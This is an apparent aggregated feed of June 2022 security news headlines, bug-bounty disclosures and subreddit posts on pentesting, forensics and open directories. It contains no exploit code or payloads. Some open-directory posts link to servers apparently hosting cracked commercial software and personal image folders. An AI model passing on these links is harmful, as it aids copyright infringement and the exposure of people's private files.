    Advanced Windows TaskScheduler Playbook by ourren; Using software visualization and transfer learning in software defect prediction by ourren; Building modular call graphs for security scanning of NodeJS applications by ourren; Satellite security: from getting started to getting through the door by ourren; A brief discussion of the "Tao" and "technique" of enterprise security building, part one: Tao by ourren. For more of the latest articles, visit SecWiki
  • Open

    read-only ethernet cable
    Hello, I'd like to make a read-only ethernet cable to sniff traffic and send it to Snort. I found a lot of links on the web, but some lack information and others are too complex. I found this, but it seems to me that it speaks about a read-only one-way cable. Obviously I need a two-way cable. Can you help me find a simple how-to? Thanks submitted by /u/SkyTeeth [link] [comments]
  • Open

    Big ol' pile of movies
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/neofaust [link] [comments]
    Mamont's open FTP Index / Page 22 of 49
    submitted by /u/thiskeepsmeupatnight [link] [comments]
  • Open

    Active Directory Penetration Testing Sample Report
    There are a bunch of web app pentest reports that can be found on https://pentestreports.com/reports/ However, I did not see any sample report for Active Directory Penetration Testing. If you happen to know of one, please share it here. Thanks submitted by /u/w0lfcat [link] [comments]
  • Open

    XSS Payload on TikTok Seller Center endpoint
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1554048 - Bounty: $1000

  • Open

    FabricScape: Escaping Service Fabric and Taking Over the Cluster
    FabricScape (CVE-2022-30137) is a privilege escalation vulnerability of important severity in Microsoft's Service Fabric, commonly used with Azure. The post FabricScape: Escaping Service Fabric and Taking Over the Cluster appeared first on Unit 42.
  • Open

    Abusing Cloudflare Workers
    submitted by /u/thorn42 [link] [comments]
    Zimbra unauthenticated RCE via unrar path traversal (CVE-2022-30333)
    submitted by /u/monoimpact [link] [comments]
    Hive Ransomware Decrypter Tool - KISA
    submitted by /u/CyberMasterV [link] [comments]
    CVE-2022-30522 - Apache httpd "mod_sed" DoS vulnerability
    submitted by /u/SRMish3 [link] [comments]
    Intune hacking: when is a "wipe" not a wipe
    submitted by /u/nopslider [link] [comments]
  • Open

    Forensic Tools for Browser Data
    Does anyone recommend any tool for extracting browser data? I am using Foxton Browser Examiner Trial, which is great. But are there any suggestions for other software similar to this? The data is partially damaged as it was deleted and then recovered. Any suggestions would be appreciated. The data is sitting in a folder rather than an installed OS. submitted by /u/niveapeachshine [link] [comments]
    Paladin Not Detecting Source Drive
    Hello Folks, I am using a Paladin USB (Version 8.x.x) on a Dell Latitude to take an image of the hard drive. Paladin is not appearing to detect the hard drive of the device, only the USB drive and my external SSD I'm using as the image destination. Secure boot is off. I tried poking around in the BIOS and disabled the UEFI Boot Path Security, but that didn't work. Has anyone come across this issue before? The only other BIOS setting I can see is that RAID is also enabled. Any tips would be appreciated. If all else fails I will just remove the hard drive and image with a write blocker so all hope is not lost yet. submitted by /u/scottrich5 [link] [comments]
    BitLocker and Unallocated Space
    I'm trying to carve for files from a system that was BitLocker encrypted. However, the free space still appears to be encrypted. Is this what everyone else typically sees? I did some testing on a VM where I enabled BitLocker, took an image and decrypted it using the recovery key, and the free space appears to be still encrypted as well. submitted by /u/Mufassa810 [link] [comments]
  • Open

    ByPass — LSA Protect (RunAsPPL)
    RunAsPPL is widely known and applied during a hardening process, not least because of how easy it is to enable the protection, but… Continue reading on 100security »
    Protocols and Servers 2 | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/protocolsandservers2 Continue reading on Medium »
    Hacker Search Engines
    A list of search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty and more Continue reading on Medium »
    The Phantom Credentials of SCCM: Why the NAA Won’t Die
    TL;DR — Stop Using Network Access Accounts! Continue reading on Posts By SpecterOps Team Members »
  • Open

    Massive Trove of Gun Owners’ Private Information Leaked by California Attorney General
    submitted by /u/Hotdogpizzathehut [link] [comments]
    Microsoft Sentinel Automation Tips & Tricks – Part 1: Automation rules
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    HTML and Hyperlink Injection via Share Option In Microsoft Onenote Application
    Hyperlink Injection is when an attacker injects a malicious link when sending an email invitation. Continue reading on InfoSec Write-ups »
    Livepeer (Non Smart Contract) Security Disclosure Program
    Program Overview Continue reading on Livepeer Blog »
    How I Earned $200 in 5 Minutes | Open Redirection
    Hello Researchers, Continue reading on Medium »
    OpenSSH CVE-2018–15473 User Enumeration Vulnerability
    Description: Continue reading on Medium »
    XSS cheatsheet payloads
    XSS PAYLOADS Continue reading on Medium »
    Step 11: Attacking Web Applications with Ffuf
    As of starting this one, it’s Monday 27th June and my second to last day in work. Continue reading on Medium »
    Giveaway #2: The Ultimate Guide to Hunt Account Takeover(2022)
    INTRODUCTION Continue reading on Medium »
    Access control worth $2000 (everyone missed this IDOR+Access control between two admins.)
    Tribute to Binit Ghimire Continue reading on Pentester Nepal »
    BugBounty Writeup: XSS, JWT none attack, Improper Error Handling
    Hackers around the world hunt bugs and, in some cases, earn full-time incomes. Continue reading on Medium »
  • Open

    STUFF
    AMC CC 2021 v17 AMC CC 2022 v26 AMC CC 2022 v31 AutoD 3ds SketchU 2017 http://in2017.iptime.org/Util/Graphic/ submitted by /u/rwolfman3000 [link] [comments]
    I found a good OD... Here you will find AutoDesk, graphics, network And programming Courses. Oh, And Fifa 22!
    http://dl.jb-team.com/ submitted by /u/yahya007 [link] [comments]
  • Open

    Nmap timing, tips and tricks?
    I can't be the only one, and I have messed around with settings, but I'm hoping someone can chime in with a better or best way to do this. So scanning an internal class C, I get a ton of this. I want to not wait 15 hours for a class C to port map, but I don't want to sacrifice accuracy either. This is just using nmap -vv -sC -sV 192.x.x.x/24 -Pn RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 adjust_timeouts2: packet supposedly had rtt of 9384712 microseconds. Ignoring time. Thanks in advance submitted by /u/networkalchemy [link] [comments]
    AlienVault OSSIM and ansible automation
    I have an AlienVault OSSIM environment where I routinely create/rebuild monitored VMs using Ansible. The usual steps to add a system to AlienVault are: Install agent on target Log into AV server via SSH Enter "Jailbreak" Register target IP using manage-agent Extract generated key and copy to target Configure key on target agent I want to automate these steps using Ansible as it's a pain to do all the above manually. Is anyone aware of any existing work in this area? submitted by /u/geggleau [link] [comments]
    I need advice from people who have gone through a similar situation
    Hey everyone, I'm a beginner in pentesting and I decided to learn it after 3 years of university as a specialist in network security. But honestly, after 3 years I didn't learn anything about pentesting (only math, Cisco and humanitarian subjects). Now it seems to me like I lost my time, and whenever I can't solve tasks in pentesting I feel very, very bad because I have to know all of this. I blame myself for how stupid I am because everyone in my surroundings is good at pentesting and they're winning in CTF. I really love pentesting but I don't feel confident; it seems to me that neither society nor my future employer needs me, because in a year I'm already graduating from the university and I don't know anything. Thank you for listening; if you have overcome a similar situation please share ^^ UPD: thanks to those who replied, it means a lot to a teenager who often forgets to just keep going. Thank you for your support *hugs to everyone* submitted by /u/_hanabi_n [link] [comments]
  • Open

    HACK THE BOX: Easy Phish
    Challenge lab: Osint Continue reading on Medium »
    War in Ukraine / June 27
    One of the bloodiest wars of the XXI century Continue reading on Medium »
    Week 7: Exciting
    Hello Everyone, Continue reading on Medium »
  • Open

    SecWiki News 2022-06-28 Review
    How detection engines' sensitivity to entropy affects packer design by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Ten days until the livestream! Full agenda of the CIS Conference Summer Edition announced
    "Security grows, restart the summer": the CIS Conference Summer Edition (Summer live) is about to arrive!
    FreeBuf Morning Report | Killnet attacks Lithuanian government websites; cyberattack forces Iranian steel company to halt production
    Killnet attacked Lithuanian government websites.
    Iran's largest steel producer hit by a cyberattack
    Ebrahimi said the company's website would be restored and back online soon. As for why the company halted operations: when the cyberattack occurred, the plant happened to be without power and could not continue production.
    "Provisions on the Administration of Internet User Account Information" published, effective August 1
    On June 27, the Cyberspace Administration of China published the "Provisions on the Administration of Internet User Account Information", effective from August 1, 2022.
    Impersonating BBVA bank's 2FA app: the deep disguise of the Android malware "Revive"
    A new Android banking malware named "Revive" has been discovered.
  • Open

    Make a Self-Replicating Virus in Python
    No content preview
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »

  • Open

    Microsoft Hall Of Fame for a Small Misconfiguration.
    Hey everyone! I’m Aman, in this write-up I am going to show how you can find rate limit bug and my journey to the Microsoft Hall of Fame Continue reading on Medium »
    The Modern-Day Android Application Pentesting Approach for BugBounties/Assessments
    Understand the Attacker’s Approach and Mindset behind Pentesting Modern-Day Android Applications :D Continue reading on Medium »
    IT'S TIME TO TAKE OVER ACCOUNT
    HOW I WAS ABLE TO TAKE OVER ANY USER ACCOUNT USING INVITE FUNCTION Continue reading on Medium »
    MUST HAVE : Skill for Cyber Security Engineer
    Are you someone with a passion for Cyber Security engineering? Let's talk business; I mean I will share the must-have skills you need to… Continue reading on Medium »
    MUST KNOW : Popular operating systems in Cyber Security
    Every aspect of our life has been fulfilled by digital devices, as we can buy everything, reserve the table for two, or pay the bills in… Continue reading on Medium »
    My Pentest Log -22 — (Account Takeover Via Sinf file)
    Greetings to all from Porta Petrion, Continue reading on Medium »
    PocketPay Mobile Application Bug Bounty Campaign
    PocketPay apps are being launched on Android and iOS app stores. It’s time for the community to evolve and make things right; yes, it’s a… Continue reading on PocketPay »
    HackerOne — Getting Started
    So HackerOne was one of my favorite places to practice. I stopped completing the challenges so the invites could be used at a later time… Continue reading on Medium »
    Cyber Security is an activity carried out with the aim of securing and preventing…
    With so many cyber crime incidents around the world, it would be good for us to produce and gather people who are skilled in… Continue reading on Medium »
    INERY BLOCKCHAIN INCENTIVIZED TESTNET WHITELIST
    Inery is the first-ever decentralized database management and blockchain solution $INR Continue reading on Medium »
    Intigriti’s June XSS challenge — Reflected XSS Write-up
    Preface Continue reading on Medium »
  • Open

    Velociraptor
    Hello. I am trying to test out Velociraptor but I'm having issues creating a "client.config.yaml" file to be used for my Windows agent installation. Has anyone been able to successfully deploy the agent in their environment on Windows, Linux and Mac OS? Also, what are you using for the "Server", a physical box or a VM? submitted by /u/antmar9041 [link] [comments]
    Open source tools and DFIR Tryhackme equivalents
    I love learning about Pentesting and DFIR, but something I've noticed is that hacking has way more open source options and better learning material. Pentesting has so many amazing cheap hands-on learning resources, DFIR on the other hand has none that I know of. DFIR seems like the only way forward is to learn SANS ($$$). Don't get me wrong, I know things like the Sleuth Toolkit exists. I just don't know where to get hands-on experience with it in a learning environment. submitted by /u/MLGShyGuy [link] [comments]
    Browser Add-on to screenshot a whole page.
    I watched this video: https://youtu.be/gue5MofILxY?t=2354 and Cody Kinsey mentions a browser add-on that can continually scroll to the bottom of someone's social media feed or website and screenshot all the way down. Later this tool stitches these together as a pdf to keep a record of their page. Is anyone familiar with a tool or browser add-on capable of this? The tools I've found are either not free or don't work. submitted by /u/MLGShyGuy [link] [comments]
  • Open

    CVE-2022-32208: FTP-KRB bad message verification
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614332 - Bounty: $480
    CVE-2022-32206: HTTP compression denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614330 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614328 - Bounty: $480
    CVE-2022-32207: Unpreserved file permissions
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614331 - Bounty: $2400
    Unauthorized Access to Internal Server Panel without Authentication
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/1548067
    Reflected XSS via `` parameter
    U.S. Dept Of Defense disclosed a bug submitted by mdakh404: https://hackerone.com/reports/1536215
    HTTP request smuggling with Origin Rules using newlines in the host_header action parameter
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1575912 - Bounty: $3100
    Bypassing Cache Deception Armor using .avif extension file
    Cloudflare Public Bug Bounty disclosed a bug submitted by bombon: https://hackerone.com/reports/1391635 - Bounty: $500
    Sign in with Apple generates long-life JWTs, seemingly irrevocable, that grant immediate access to accounts
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593413 - Bounty: $250
    Sign in with Apple works on existing accounts, bypasses 2FA
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593404 - Bounty: $1000
    API docs expose an active token for the sample domain theburritobot.com
    Cloudflare Public Bug Bounty disclosed a bug submitted by sainaen: https://hackerone.com/reports/1507412 - Bounty: $500
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Internet Bug Bounty disclosed a bug submitted by windshock: https://hackerone.com/reports/1599573 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1569946
    CVE-2022-32206: HTTP compression denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1570651
    CVE-2022-32207: Unpreserved file permissions
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1573634
    CVE-2022-32208: FTP-KRB bad message verification
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590071
    Credential leak when use two url
    curl disclosed a bug submitted by chen172: https://hackerone.com/reports/1569926
  • Open

    How does a threat Intel company business model work?
    I was wondering how do companies that specialize in providing threat Intel generate revenue? Do they provide Intel feeds on a subscription based model to customer companies, or are they usually selling B2B to vendors such as fire wall companies? Thank you submitted by /u/DoubleAgent10 [link] [comments]
    Sending an email
    I have a question about SMTP servers. I learned that when sending mail, the sender's SMTP server forwards the mail to the recipient's SMTP server. When I heard that the SMTP server on the recipient's side forwards the mail to the POP/IMAP server for the recipient to receive, I thought why not just receive the mail directly from the SMTP server? submitted by /u/Awkward_String139 [link] [comments]
    Awesome Hacker Search Engines
    Hi everybody. Just published a repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc.. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt [link] [comments]
    Is ELK as an integrated security solution any good?
    I am pretty impressed by the amount of integrations one can enable on an ELK stack. Basically, it can provide SIEM capabilities, EDR functions through osquery modules, dashboarding for every situation, network topology mapping and so much more. Moreover, it does cut the total spending quite a lot, especially when compared to other specialized solutions like Splunk and similar. I have 3 main questions: Is anyone successfully using it? Pros/cons to ad hoc solutions? How much maintenance/development does it require to keep running all the pieces together? Thank you in advance. submitted by /u/gatheringchaos [link] [comments]
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
    How I was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    War in Ukraine / June 24–26
    Russia is actively shelling Ukraine Continue reading on Medium »
    OSINT CTFs
    OSINT CTFs (Capture The Flag games) let you hone your skills through problem-solving games. I especially like those that educate you… Continue reading on Medium »
    Profil3r Tool — OSINT Tool
    Profil3r Tool Continue reading on Medium »
    How do I destroy malware and identify the author — Malware Analysis
    Hello Hackers, I’m MrEmpy and welcome. Today I will tell a story of how I found the author of malware. Continue reading on Medium »
  • Open

    SecWiki News 2022-06-27 Review
    Thoughts on building an offence-and-defence detection system for commercial banks by ourren; SecWiki Weekly (Issue 434) by ourren; Introduction to information system supply chain security management by ourren; Open-source satellite ground station OpenATS by ourren. For more of the latest articles, visit SecWiki
  • Open

    Offensive Security: Getting Your Foothold In The Industry
    It’s been about a month since I published my last article discussing my OSCP journey and how I passed it. I am truly grateful for the… Continue reading on Medium »
    Kerberoasting Attacks and Detections
    Basic Overview Continue reading on Medium »
    A Plan for OSCP
    Hey, everyone welcome to my OSCP journey. Continue reading on Medium »
  • Open

    PortSwigginar - 22 June
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: A recap on "what's new" within the product for those who h
  • Open

    Revive: from spyware to Android banking trojan | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    VaultBoot: remote attestation
    submitted by /u/hardenedvault [link] [comments]
    Notes on OpenSSL remote memory corruption
    submitted by /u/Gallus [link] [comments]
  • Open

    FreeBuf Morning Report | Tencent QQ responds to mass account hijacking; hackers still exploiting the Log4Shell vulnerability
    Tencent QQ officially responded that the main cause was users scanning forged game-login QR codes created by criminals and authorizing the login; the sessions were hijacked and recorded by an underground gang and then used by criminals to send inappropriate image advertisements.
    "Security Certification Specification for Cross-Border Processing of Personal Information" published to regulate cross-border personal information activities
    The Certification Specification sets out requirements covering basic principles, the requirements that personal information processors and overseas recipients must follow in cross-border processing activities, and the protection of the rights and interests of personal information subjects.
    "Anti-Telecom and Online Fraud Law of the People's Republic of China (Draft for Second Review)" published
    The Anti-Telecom and Online Fraud Law has seven chapters and forty-six articles and will help further prevent, curb and punish telecom and online fraud and strengthen anti-fraud work.
    Russia fines Google for spreading "unreliable" information discrediting its army
    Russian telecom regulator Roskomnadzor has fined Google 68 million rubles (about US$1.2 million).
    Large-scale QQ account hijacking sends indecent photos to friends; Tencent responds
    After a QQ account is hijacked, it automatically joins various spam groups and automatically sends spam, pornography and gambling messages and links to friends and groups.
    Explosion at a Texas natural gas plant; Russian threat actors may be behind it
    Recently, a liquefied natural gas plant in Texas exploded; the investigation found the incident may have been caused by a cyberattack, and Russian threat actors may be behind it. The explosion occurred at the Freeport LNG liquefaction plant on Quintana Island, Texas, and the accident will have a lasting impact on Freeport LNG's operations. The preliminary investigation indicated the incident was caused by overpressure and rupture of a section of the LNG transfer pipeline, leading to rapid flashing of the LNG and the release and ignition of a natural gas vapor cloud. It is not yet clear why the company's safety mechanisms were unable to prevent the explo…
  • Open

    Pretty good archive of TV, with differing quality types, it's seems to have some dubbed
    submitted by /u/hannibalateam [link] [comments]
    Huge directory of music videos
    submitted by /u/ilikemacsalot [link] [comments]

  • Open

    linx - Reveals invisible links within JavaScript files
    submitted by /u/rjz4 [link] [comments]
  • Open

    Detecting Linux Anti-Forensics Log Tampering
    submitted by /u/lugh [link] [comments]
    What is the modern, unofficial digital forensics process model that sees the most real-world application to investigations?
    To my understanding and research thus far which may be incorrect, I have gathered that there is still no official model to follow for digital forensic investigations. However, there are a number of proposed models such as: First proposed methodology from Politt outlines: Acquisition>Identification>Evaluation>Admission. DFRWS investigative model outlines: Identification>Preservation>Collection>Examination>Analysis>Presentation. Abstract digital forensics model (ADFM) outlines: Identification>Preparation>Approach Strategy>Preservation>Collection>Examination>Analysis>Presentation>Returning Evidence. Integrated digital investigation process (IDIP) outlines: Readiness Phase>Deployment Phase>Physical Crime Scene Investigation Phases/Digital Crime Scene Investigation Phases>Review Phase. Etc... That said, is there a proposed model that is used more commonly in modern investigations than others to the point in which it can almost be considered the unofficial standard? Or is it truly "pick what's most applicable to this specific investigation"? Thank you. submitted by /u/ringzero_ [link] [comments]
  • Open

    Intigriti’s May XSS challenge By PiyushThePal
    How far can you take prototype pollution? This challenge is a great showcase which uses an unpatched jQuery plugin to exploit and bypass… Continue reading on Medium »
  • Open

    Bypassing Cloudflare WAF with Host header manipulation
    Hey Folks! Thanks for your responses on my last blog. Let’s learn something new today as it is going to be damn interesting one. Continue reading on Medium »
    The OS, or Operating System, is a very important element in the device we hold in our hands today…
    Linux: as a Cyber Security Engineer we must really understand what Linux is and how to use it. Basically… Continue reading on Medium »
    MSA Weekly 1 — “5 Operating Systems for Cyber Security”
    Ethical Hacking is an activity of identifying weaknesses in computer systems or computer networks and can… Continue reading on Medium »
    MSA Weekly 1 — “Skills a cyber security engineer must have”
    Well, we have learned about the operating systems commonly used in cyber security; now let's learn some skills that must… Continue reading on Medium »
    MSA Weekly 1 — “5 Cyber Security OSes you have to know!”
    In today's digital age, we are certainly familiar with the term cyber security. Quoting Cisco, cyber security… Continue reading on Medium »
    How to find bugs : ULTIMATE TIPS
    There is consistently one more bug to fix. On the off chance that we don’t fix 100% of the bugs in our site, the site will be totally… Continue reading on Medium »
    How to find 1st bug for beginner bounty hunters (from personal experience)
    For people starting the bug bounty journey… Continue reading on Medium »
    MSA Weekly 1 - “Skills a Cyber Security Engineer must have”
    Entering the information era, in which communication and commerce via the internet are the main focus for businesses, consumers, governments and… Continue reading on Medium »
    MAGNETY TESTNET QUICK GUIDE
    Magnety is The first DeFi Social Wallet Continue reading on Medium »
    My Reason for Writing on Medium as a Bug Bounty Hunter
    I’m a hacker who likes to write. Continue reading on Medium »
  • Open

    User can link non-public file attachments, leading to file disclose on edit by higher-privileged user
    Phabricator disclosed a bug submitted by foobar7: https://hackerone.com/reports/763177 - Bounty: $500
  • Open

    How did I design and build a complex AD set
    Hi Folks, today I would like to share how did I design and build a vulnerable AD set. Before moving to this topic, let me introduce the… Continue reading on Medium »
    Red Team vs Blue Team
    As I study for my Security+ exam, I covered the topic of the Read Team and Blue Team. In the world of cybersecurity, these groups work… Continue reading on Medium »
    Walkthrough of My Vulnerable AD Set
    Hi guys, in previous days I designed and built a difficult and complex vulnerable AD set, I planned to post the guide to reproduce it… Continue reading on Medium »
  • Open

    Decrypting TLS In Wireshark For Homegrown Application
    Hello Everyone! I posted about this in /r/networking yesterday (link below for background), made some progress there, but hoping I can get a little further here. We have an in-house application we've written for our client for network communication over the internet between us and them. Almost everything is working well except for some errors inside the TLS stream they've asked me to debug. My company created the certificates in Windows Server 2019 by installing the "Certificate Authority" role. I have the password used to create the cert. So in theory I should have access to everything I need to decrypt the TLS sections of the packet capture, but this is the first time I've done this and I'm not having any luck. I have the .pfx files and I used openssl.exe to export the private key and openssl didn't report any errors in that process. I tried that private key in Wireshark but it didn't decrypt the TLS stream. So I tried converting that to a plain-text unencrypted private key file with openssl.exe and loaded that into Wireshark, still didn't decrypt the TLS stream. I've tried every combination I can think of in Wireshark. In Protocols>TLS I've tried the options "RSA Keys List", "TLS Debug File", "Pre-Shared Key", and "(Pre)-Master-Secret log filename". There is also a general "RSA Keys" section in the main Preferences window and I loaded the keys there as well, no luck. The "Application Data" packets still show up with the encrypted data. I also made sure the private key file name matched the "commonName" field of the certificate exchange packet in the capture. I'm unsure how to proceed from here. What am I missing? What else can I try? https://old.reddit.com/r/networking/comments/vkrz4g/decrypting_tls_in_wireshark_for_homegrown/? submitted by /u/LearningSysAdmin987 [link] [comments]
  • Open

    SecWiki News 2022-06-26 Review
    QingTing: a security tool orchestration platform by ourren; Tracking and interpreting the US EINSTEIN program (2022 v1 edition) by ourren; Named entity recognition based on continual learning methods by ourren; Space cybersecurity risks and attack-defense exercises by ourren; For more of the latest articles, visit SecWiki
  • Open

    Video analysis of police brutality against abortion rights activists.
    In a ruling that was as groundbreaking as it was controversial, six of the nine high courts overturned federal abortion law on Friday… Continue reading on Medium »
    SPY NEWS: 2022 — Week 25
    Summary of the espionage-related news stories for the Week 25 (19–25 June) of 2022. Continue reading on Medium »
  • Open

    Great Open Source Vulnerability Scanner on GitHub
    Article URL: https://github.com/mageni/mageni Comments URL: https://news.ycombinator.com/item?id=31882071 Points: 1 # Comments: 0

  • Open

    Jump starting an investigation ( school assignment)
    So I was given a flash drive to analyze and the files are of a .001, .002, .003, etc... It's been a while since I've done such an assignment, due to many General Ed and such classes since my last Forensics class. Any help on how I can proceed from this? I tried Encase and it only gives me the .001 file to load, but I proceed to do that and nothing happens. Any help would be greatly appreciated. submitted by /u/DeviantWolfe [link] [comments]
    What do you think about this workstation I built.
    submitted by /u/L4Z3R_H4WK [link] [comments]
  • Open

    Basic WebAssembly buffer overflow exploitation
    submitted by /u/chaplja [link] [comments]
  • Open

    Unified identity management solution: from analysis to implementation notes
    A unified identity management solution still has some reference value for advancing the increasingly strict standardization work in the industry.
  • Open

    Which resume is best? The one I created with Canva or the one I created with Word?
    word : https://drive.google.com/file/d/12x7-ENfdy9NI1nWpELRQCWCprJb4_FQG/view?usp=sharing canva : https://drive.google.com/file/d/1H-E8cOfq3sKC6onlJY2ZxN5nkQ7-mRni/view?usp=sharing submitted by /u/Appropriate_Text1996 [link] [comments]
    Aiming for SOC analyst positions, overhauled my resume, how's it look?
    Taking Security+ in 3 weeks (been studying for the past few months). My goal is to become a SOC analyst as I really like working with technical data. My background is in gov / DOD intel and I previously applied to a bunch of entry level cyber jobs but got like 1 response so I completely redid my resume and tried to make the skills as relatable to netsec as possible. After I have Sec+ I'm planning to get my hands on an open source SIEM and get familiar with it at home. Possibly also going to study for CySA+ too while I apply for jobs. How does my resume look (as someone trying to transition into network security)? Any other ways / things I can do to make myself stand out (again specifically going for SOC analyst)? And what's missing (beyond the obvious like experience with specific tools, SIEMs, IDS, IPS, firewalls, etc.)? Greatly appreciate any input / suggestions as I've been attempting to get into network security for a while now! https://imgur.com/a/3tPLmF3 submitted by /u/Anontrovert [link] [comments]
    How to set up a laptop as a dedicated mal-lab that has access to my home network for malware to send and receive traffic but cannot propagate to the rest of my devices?
    Hey all, After several years of self-teaching myself malware analysis, I was recently hired as a junior malware analyst for an IR company and I love it. Naturally, I want to practice at home in my free time as much as possible to continue learning. All of my independent analysis at home for learning purposes has been conducted in VMware for the ability to set everything up with my tools, snapshot, and go to town. As we all know, the problem with analyzing most modern malware on a VM is: Contains many methodologies to detect a virtual environment that is frankly a pain to attempt to circumvent. Only continues its malicious execution or drop/download of files from C2C if it can establish a genuine, consistent network connection. This is where isolating a VM from a network and attempting to use tools like FakeNet is rather difficult as while it's spoofing responses, the malware is still not able to download additional malicious files. That said, is it possible to take a laptop that I have and turn it into a glorified malware lab that can: Somehow contain the ability to revert to a "snapshot" as you'd see with a VM. Connect to my home network so the malware can send and receive legitimate network traffic while remaining separate from the other devices on my network (maybe a VLAN somehow?). Thank you, guys! submitted by /u/decyphier_ [link] [comments]
  • Open

    Russian tanks and other military stuff
    Russian tanks, pictures and blueprints http://armchairgeneral.com/rkkaww2/galleries/ ​ A blog from around 2001-2003, not much content but some interesting thoughts on Afghanistan from then along with a handful of pictures from there. http://www.nuui.com/Sections/ ​ airwar dot ru/other/ (Reddit auto spam filters hate this one which is why there's no URL) /draw, /draw2, and /draw3 have .zips of airplane diagrams, /manuals has a handful of plane manuals Also see airwar dot ru/image/ submitted by /u/c-rn [link] [comments]
    A Few ODs I have found in a span of a Couple Days.
    Some random ODs, not worth a single post, so I saved them and posting as a list. http://francois-planchu.com/images/(Someone's personal site, Random Pictures [Contains NSFW]) https://www.fundacionrenta.com/assets/ (Stock images, Fonts, and other assets) https://www.propweb.in/assets/ (More random assets) https://www.etrio.in/blog/ (Some Indian EV Website data, images, catalog, Promos) submitted by /u/amritajaatak [link] [comments]
    Time Magazine 1923-2014
    https://magazineproject.org/TIMEvault/ submitted by /u/c-rn [link] [comments]
    Does anyone else get a 403 Forbidden error when attempting to span hosts?
    As the title says. When I go to an imgur link directly, I can download just fine, but if I have to use the span hosts option in wget, I receive a 403 Forbidden error. Is there an explanation? submitted by /u/FuckedUpRetort [link] [comments]
    Commodore Amiga screenshots and box art
    http://www.amigalive.com/game-images/ submitted by /u/c-rn [link] [comments]
    Open directory of a cosplayer
    http://www.hosting.tk-lee.com/ Didn't look through everything so tagging nsfw submitted by /u/c-rn [link] [comments]
  • Open

    SecWiki News 2022-06-25 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    List of ARM cores affected by PACMAN vulnerability
    Article URL: https://developer.arm.com/documentation/ka005109/1-0?lang=en Comments URL: https://news.ycombinator.com/item?id=31876148 Points: 2 # Comments: 0
  • Open

    HDX (Headline Crypto) INCENTIVIZED TESTNET QUICK GUIDE, WITH 250,000 $HDX AS REWARDS
    HEADLINE Crypto is a Texas-based blockchain project and token from the team behind AlgoPay, AlgoCloud, Vaults Protocol, FORUM, PIPELINE-UI… Continue reading on Medium »
    INFORMATIX TESTNET COMPETITION QUICK GUIDE, 750,000 $INFO tokens up for grabs
    Infomatix is a data collection tool that aims to build the world's most comprehensive financial database through crowd sourced expertise. Continue reading on Medium »
    MSA Weekly 1 — “5 OSes for Cyber Security”
    When we talk about what is called an Operating System (OS), there are very many developers out there who build/develop Operating Systems… Continue reading on Medium »
    How I stopped hunting on HackerOne after years because they stole my $50k. And so should you.
    You may have heard about Belarusian security researcher xnwup and the story of blocking his $25k on HackerOne. It was pretty resonant at… Continue reading on Medium »
  • Open

    Next 13 Chrome extensions for OSINT
    We continue to look for extensions for the Google CHROME browser for you, which will help in the difficult task of finding information in… Continue reading on Medium »
    Instagram Information Gathering Tools
    I write this blog for those aspirants who are too enthusiastic to make a career in the field of Ethical hacking. For making a profession… Continue reading on Medium »
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview

  • Open

    Harmless NumPy issue receives CVE medium
    Article URL: https://github.com/numpy/numpy/issues/18993 Comments URL: https://news.ycombinator.com/item?id=31870409 Points: 3 # Comments: 0
  • Open

    Basic XSS Bypasses
    Alert(1) Continue reading on Medium »
    Cyber Security is an activity carried out with the aim of securing and preventing…
    With the many cyber crime incidents all over the world, it would be good for us to produce and gather people who are skilled in… Continue reading on Medium »
    Writing your own Burpsuite Extensions: Complete Guide
    Recently I had to create some extensions for Burpsuite. I tried finding resources that could help me but couldn’t find much. Most of them… Continue reading on Medium »
    IDOR leads to revoke access from third party user account
    Hello everyone , Continue reading on Medium »
    How I was able to delete any users’ OAUTH connections via IDOR
    ﷽ Continue reading on Medium »
    Sensitive Token Leakage from server side
    Hi all, I am back with a new hacking story! So, one month ago I was hunting on a VDP program which is one of India's most successful… Continue reading on Medium »
    An Out Of Scope domain Leads To a Critical Bug[$1500]
    Hello All, I am Shakti Ranjan Mohanty (3ncryptsaan). Continue reading on Medium »
    CVE Hunting Tips #002
    Text Input Denials of Service Continue reading on The Mayor »
    SAUCERSWAP TESTNET BUG BOUNTY WITH 1,250,000 SAUCE AS REWARD
    About Sauceswap Continue reading on Medium »
  • Open

    [NSFW] Lots of beach cheeks
